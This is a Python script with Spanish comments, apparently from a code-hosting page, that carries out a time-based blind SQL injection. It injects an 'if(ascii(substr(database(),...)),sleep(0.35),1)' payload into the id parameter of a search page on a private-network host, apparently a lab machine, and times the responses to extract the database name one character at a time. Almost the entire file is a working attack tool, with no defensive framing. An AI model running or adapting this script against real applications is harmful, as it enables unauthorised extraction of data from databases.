66 lines
1.3 KiB
Python
66 lines
1.3 KiB
Python
|
#!/usr/bin/env python
|
||
|
|
"""
|
||
|
|
Este script realiza una inyección SQL de tipo Time-Based Blind SQL Injection
|
||
|
|
"""
|
||
|
|
import requests
|
||
|
|
import signal
|
||
|
|
import sys
|
||
|
|
import time
|
||
|
|
import string
|
||
|
|
|
||
|
|
from pwn import *
|
||
|
|
|
||
|
|
|
||
|
|
def signal_handler(signal, frame):
|
||
|
|
"""
|
||
|
|
Salir con Ctrl+C
|
||
|
|
"""
|
||
|
|
print('Saliendo con Ctrl+C!')
|
||
|
|
sys.exit(0)
|
||
|
|
|
||
|
|
|
||
|
|
signal.signal(signal.SIGINT, signal_handler)
|
||
|
|
|
||
|
|
|
||
|
|
# Variables globales
|
||
|
|
main_url = "http://192.168.1.121/searchUsers2.php"
|
||
|
|
characters = string.printable
|
||
|
|
|
||
|
|
|
||
|
|
def makeSQLI():
|
||
|
|
|
||
|
|
p1 = log.progress("Fuerza bruta")
|
||
|
|
p1.status("Fuerza bruta en proceso")
|
||
|
|
|
||
|
|
time.sleep(2)
|
||
|
|
|
||
|
|
p2 = log.progress(f"Datos extraídos")
|
||
|
|
|
||
|
|
extracted_info = ""
|
||
|
|
|
||
|
|
for position in range(1, 10):
|
||
|
|
|
||
|
|
for character in range(33, 126):
|
||
|
|
|
||
|
|
sqli_url = main_url + \
|
||
|
|
"?id=1 and if(ascii(substr(database(),%d,1))=%d,sleep(0.35),1)" % (
|
||
|
|
position, character)
|
||
|
|
|
||
|
|
p1.status(
|
||
|
|
f"\n[i] Probando posición {position} el carácter: {chr(character)}")
|
||
|
|
|
||
|
|
time_start = time.time()
|
||
|
|
|
||
|
|
r = requests.get(sqli_url)
|
||
|
|
|
||
|
|
time_end = time.time()
|
||
|
|
|
||
|
|
if time_end - time_start > 0.35:
|
||
|
|
extracted_info += chr(character)
|
||
|
|
p2.status(extracted_info)
|
||
|
|
break
|
||
|
|
|
||
|
|
|
||
|
|
if __name__ == "__main__":
|
||
|
|
makeSQLI()
|